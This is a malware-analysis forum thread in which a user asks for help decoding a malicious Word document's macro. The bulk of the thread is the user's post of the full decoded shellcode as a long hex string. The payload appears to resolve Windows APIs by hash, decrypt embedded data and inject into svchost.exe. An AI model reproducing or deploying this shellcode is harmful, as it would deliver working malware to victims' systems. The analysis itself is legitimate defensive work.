Malware Analysis Need help on analyzing this suspicious .doc file

yyangcs

Level 1
Thread author
Mar 3, 2017
6
Hello,

Recently, I received this suspicious document
(can be downloaded at mal_doc.zip) -- password: infected (if required)
but could not figure out how the embedded shellcode works. Here is so far what I have got:

Through debugging, the macro is trying to decode the following encoded string

1.png

The encoded string is stored in object 25

2.png

The decoding function can be found in VBA macro 'irresolvedly'
3.png


and the decoded shellcode I got looks as follows:

4883EC084C8BC94D85C0741348893C24488BF90FB6C2498BC8F3AA488B3C24498BC14883C408C3CCCCCCCCCCCCCCCCCC4885C9750333C0C3B84D5A000066390175F34863413C4803C133C9813850450000480F45C1C3CCCCCCCCCCCCCCCCCCCC440FB6020FB601412BC0751B482BCA904584C07412440FB642010FB644110148FFC2412BC074E985C0790483C8FFC3B90100000085C00F4FC1C3CCCCCCCCCCCC65488B042530000000488B4860488B4118488B4030488B4010C3CCCCCCCCCCCC4C8BC90FB6094533C084C974260F1F00418BC0418BD00FBEC9C1E818C1E20749FFC1448BC0440BC24433C1410FB60984C975DD418BC0C3CCCCCCCCCCCCCCCCCC4C8BDA4885C97466B84D5A0000663901755C4C63513C4C03D141813A50450000754CB8648600006641394204754033C041813A504500004C0F45D0438B94C28800000085D2742741398284000000761E4D85DB740B438B84C28C0000004189034584C97505488D0411C3488BC2C333C0C3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC8D41BF3C1977070FBEC183E841C38D419F3C1977070FBEC183E847C38D41D03C0977070FBEC183C004C380F92B7506B83E000000C333C0BA3F00000080F92F0F44C2C3CCCCCCCCCCCCCCCCCCCCCCCCCC8D044903C025070000807D07FFC883C8F8FFC0F3C3CCCCCCCCCCCCCCCCCCCCCC8D044903C09983E20703C2C1F803C3
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC4883EC080FB6114C8BC94C8BD984D20F84E900000048895C241048896C241833DB488974242048893C248D6B3F0F1F008D42BF3C19770A440FBEC24183E841EB398D429F3C19770A440FBEC24183E847EB288D42D03C09770A440FBEC24183C004EB1780FA2B750841B83E000000EB0A4533C080FA2F440F44C58BC39983E20703C28BF083E0072BC2C1FE03BA010000008BF84C63D6F7DF8D4F08D2E2FECAF6D24320141A83F8037D0C8D4F0241D2E04708041AEB228D48FE418BC0D3F88D4F0A4308041A8D460141D2E04863D043C6441A01004608041A410FB6510149FFC183C30684D20F8545FFFFFF488B3C24488B742420488B6C2418488B5C24104883C408C3CCCCCCCCCCCCCCCCCCCCCCCCCCC20000CCCCCCCCCCCCCCCCCCCCCCCCCC4183C8FF4C8BC985D20F84B1000000448BD26666666666660F1F840000000000410FBE0149FFC14433C0418BC041D1E883E001F7D8252083B8ED4133C08BC8D1E883E101F7D981E12083B8ED33C88BC1D1E983E001F7D8252083B8ED33C18BC8D1E883E101F7D981E12083B8ED33C88BC1D1E983E001F7D8252083B8ED33C18BC8D1E883E101F7D981E12083B8ED33C88BD1D1E983E201F7DA81E22083B8ED33D1448BC2D1EA4183E00141F7D84181E02083B8ED4433C249FFCA0F8560FFFFFF41F7D0418BC0C3CCCCCCCCCCCCCC
CCCC48895C240848896C2410488974241848897C2420415441558BF24C8BD94885C90F84BD000000B84D5A00006639010F85AF0000004863493C4903CB8139504500000F859C000000B864860000663941040F858D0000004533ED813950450000490F45CD8B818800000085C074764439A984000000766D4903C37468448B6024448B48208B681C4D03E34D03CB4903EB74524D85C9744D8B7818458BD585FF7443418B11458BC54903D30FB61A84DB7422418BC8418BC048FFC2C1E007C1E918448BC1440BC00FBEC30FB61A4433C084DB75DE443BC6742741FFC24983C104443BD772BD33C0488B5C2418488B6C2420488B742428488B7C2430415D415CC34963C2410FB70C444863448D004903C3EBD5CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC48895C24085556574154415541564157488DAC2400FBFFFF4881EC0006000065488B042530000000BA19505BD5488B4860488B4118488B48304C8B7110498BCEE89BFEFFFF4C8D8D500500004C8D45A8488BD8B87200000033D26689458C488D458833C9488945B0B818000000C745886B006500668945A8B834000000C7458E6E006500C745926C003300C7459632002E00C7459A64006C00668945AAC7459E6C000000FFD3488B8D50050000BAC5C37414E829FEFFFF4883C9FFC744247869002E0048898558050000B850000000C744247C64006C006689442470B8
73000000C745806C0000006689442472B861000000488D7C24706689442474B8700000004C8D4DC86689442476488D4424704C8D45A8488945B033C033D266F2AFB82800000048F7D1668945AA48FFC96603C966894DA833C9FFD3488B4DC8BAFB79AF42E89AFDFFFF488B8D50050000BA565665F74C8BE8E886FDFFFF488B8D50050000BA0FE7E82D488BF0E872FDFFFF33FFC785480500002E646F638BDF41BF535400004C8BE0889D4C0500000F1F440000488D55D841B830000000488BCBFFD64885C07466488B55D84C8D852001000041B9040100004883C9FF41FFD58BD085C07448488D8C151C010000488D954805000041FFD485C07532488B55F08BCF4885D2742B488B7DD8813F2154525575076644397F047420FFC148FFC74863C1483BC272E433FF4803DAEB86488B55F04803DAE97AFFFFFF488B8D50050000BACE5867F4E8B9FCFFFFBBF471000041B90400000041B80010000033C94C8BE88BD341FFD5488BF04885C00F84D20200004883C70A488BC8482BCF0F1F8400000000000FB60748FFC748FFCB884439FF75F133D2488BCEBF001C00000F1F80000000008B01F6C20175073578533835EB0535C9A1432489014883C104FFC248FFCF75E0488BCEE848FAFFFF488B8D50050000BAD4CE6D9BE827FCFFFFBAB15CC2F1498BCE488BF8E817FCFFFF488B8D50050000BACBD833D64C8BF0E803FCFF
FF488B8D50050000BACE78C765488945B8E8EEFBFFFF488B8D50050000BAEBD4FF7F488945D0E8D9FBFFFF488B8D50050000BA22E3CC614C8BF8E8C5FBFFFF488B8D50050000BA22E3CD61488BD8E8B1FBFFFF488B8D50050000BAA05160BC488945C0E89CFBFFFF488D8D3002000033D241B868020000E888F7FFFF488D5510488D4C245041B804010000C785300200000B001000C74424502577696EC744245464697225C74424585C537973C744245C574F5736C7442460345C7376C744246463686F73C7442468742E657866C744246C6500FF9558050000BA18000000448D4AEC33C941B80010000041FFD5BA6800000033C9448D4A9C41B8001000004C8BE041FFD54C896424484533ED48894424404C896C24384C896C2430488D4D104533C94533C033D2C744242804000000C7006800000044896C2420FFD785C00F84FF000000498B4C2408488D9530020000FFD385C00F84E9000000498B0C24BA0000400041FFD6BA4D5A00006639167405418BDDEB1148635E3C4803DE813B50450000490F45DD448B4350498B0C24BA0000400041B90030000048899D58050000C744242040000000FF55B84C8BF04885C00F848C000000448B4B54498B0C244C8BC6488BD04C896C242041FFD785C074720FB743060FB74B1485C07E42488D7C192C448BE833DB666666660F1F840000000000448B078B57F8448B4FFC49
8B0C244C03C64903D648895C242041FFD74883C72849FFCD75DB488B9D580500008B4328488D9530020000418D0C06898DE0020000498B4C2408FF55C0498B4C2408FF55D033C0488B9C24400600004881C400060000415F415E415D415C5F5E5DC3CCCCCCC20085C0750333C0C3B94D5A000066390875F38B483C03C88B012D50450000F7D81BC0F7D023C1C36BC0069983E20703C2C1F803C36BC006250700008079054883C8F840C38D48BF80F91977070FBEC083E841C38D489F80F91977070FBEC083E847C38D48D080F90977070FBEC083C004C33C2B75046A3E58C33C2F75046A3F58C333C0C38BD18A0933C084C97418568BF0C1E007C1EE180BF00FBEC133C6428A0A84C975EA5EC3558BEC5151535657C745F8CC020000C645FC00608B7D088A45FC8B4DF8F3AA615F5E5BC9C3558BEC51518B45088365FC008945F88A0084C07468535657E85BFFFFFF8BD88B45FCE834FFFFFF8B4DF88D14088B45FCE833FFFFFF8BF88BF0F7DE8D4E08B001D2E0FEC8F6D0200283FF037D098D4E02D2E3081AEB158D4FFE8BC3D3F88D4E0AD2E30802C6420100085A01FF45088B45088A00FF45FC84C0759E5F5E5BC9C38BC6E8AFFEFFFF85C07425B94C01000066394804751A8B487885C9741383787400760D85D274058B407C89028D0431C333C0C3558BEC515153568B7508578D55F8E8BAFFFFFF85C074448B70248B
78208B581C037508037D08035D08743085FF742C8B40148365FC008945F885C0741E8B45FC8B0C87034D08E8BBFEFFFF3B450C7412FF45FC8B45FC3B45F872E233C05F5E5BC9C38B45FC0FB704468B0483034508EBEC558BEC81ECA405000064A1300000008B400C8B401C8B40085356576819505BD550894590E866FFFFFF59596A6B8BF8586A656689855CFFFFFF586A726689855EFFFFFF586A6E66898560FFFFFF586A6566898562FFFFFF586A6C5E6A3366898564FFFFFF8BC666898566FFFFFF586A3266898568FFFFFF586A2E6689856AFFFFFF586A646689856CFFFFFF586689856EFFFFFF8BC666898570FFFFFF66898572FFFFFF33C066898574FFFFFF6A188D855CFFFFFF89459C586A3466894598586689459A8D45F4508D45985033DB5353FFD768C5C37414FF75F4E8B1FEFFFF59596A508945F0586A7366898578FFFFFF586A616689857AFFFFFF586689857CFFFFFF6A70586689857EFFFFFF6A6958668945806A2E58668945826A6458668945848BC66689458633C06689458A8D8578FFFFFF6689758889459C8D4802668B1083C002663BD375F52BC1D1F803C06A2866894598586689459A8D854CFFFFFF508D4598505353FFD768FB79AF42FFB54CFFFFFFE818FEFFFF68565665F7FF75F48BF0E809FEFFFF680FE7E82DFF75F48945ECE8F9FDFFFF83C4188945F8895DFCC745E42E646F63885DE8
BF040100006A1C8D8530FFFFFF50FF75FCFF55EC85C0745A578D8528FDFFFF50FFB530FFFFFF6AFFFFD63BC374448D4DE4518D840524FDFFFF50FF55F885C07531399D3CFFFFFF76298B9530FFFFFF8D0C10813921545255894DA0750CB95354000066394C10047414403B853CFFFFFF72DD8B853CFFFFFF0145FCEB8868CE5867F4FF75F4E85CFDFFFF59596A046800100000BEF471000056538945F8FFD08BC8894D943BCB0F84650200008B45A08975FC83C00A8BF12BF08A10FF4DFC88140640395DFC75F233F6895DFCF645FC018B040E75073578533835EB0535C9A14324FF45FC89040E83C60481FEF471000072DA51E83CFCFFFF8B75F468D4CE6D9B56E8E0FCFFFF68B15CC2F1FF75908945A0E8D0FCFFFF68CBD833D6568945FCE8C2FCFFFF68CE78C76556898550FFFFFFE8B1FCFFFF68EBD4FF7F56898554FFFFFFE8A0FCFFFF68EF643AB8568945ECE892FCFFFF68EF643BB856898558FFFFFFE881FCFFFF68A05160BC56894590E873FCFFFF8BF08D855CFAFFFF83C44450E88BFBFFFF598D458C506AFFC7855CFAFFFF07000100C745C42577696EC745C864697225C745CC5C537973C745D074656D33C745D4325C7376C745D863686F73C745DC742E657866C745E06500895D8CFFD6578D852CFEFFFF50395D8C75058D45C4EB3AC745A42577696EC745A864697225C745AC5C537973C745B0574F5736
C745B4345C7376C745B863686F73C745BC742E657866C745C065008D45A450FF55F06A04BF00100000576A1053FF55F86A04576A445F57538BF0FF55F8565053536A045353538938538D852CFEFFFF50FF55A085C00F84B70000008D855CFAFFFF50FF7604FF559085C00F84A20000006800004000FF36FF55FC8B4594E8E8F9FFFF6A4068003000008BF8FF77506800004000FF36FF9550FFFFFF8945F03BC3747053FF7754FF759450FF36FF55EC85C0745F0FB74F060FB747148D44382C3BCB7E2A8945FC894DF8EB038B45FC8B08034D9453FF70FC8B40F80345F05150FF36FF55EC8345FC28FF4DF875DE8B47280345F089850CFBFFFF8D855CFAFFFF50FF7604FF9558FFFFFFFF7604FF9554FFFFFF5F5E33C05BC9C20800

However, when I tried to disassemble the code in Immunity,
4.png


Looks like something wrong with the shellcode. Can anyone take a look at the file I attached and tell me where might be wrong? Thanks.
 

Winter Soldier

Level 25
Verified
Top Poster
Well-known
Feb 13, 2017
1,486
Probably the binary is masked through a packer.
But something strange because usually the macro starts a dropped executable file, or it is downloaded from the Internet.
In this case instead, it seems to use a shellcode, encoded in base-64 and integrated into the document code, which is decoded automatically by loading the malware's code, probably encrypted.
 
  • Like
Reactions: frogboy

yyangcs

Level 1
Thread author
Mar 3, 2017
6
Probably the binary is masked through a packer.
But something strange because usually the macro starts a dropped executable file, or it is downloaded from the Internet.
In this case instead, it seems to use a shellcode, encoded in base-64 and integrated into the document code, which is decoded automatically by loading the malware's code, probably encrypted.

Yes. The shellcode is encoded and the shellcode I posted is what I got after decoding function "prodromus". I am just curious about how this shellcode could work like dropping files or downloading file from Internet.
 

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top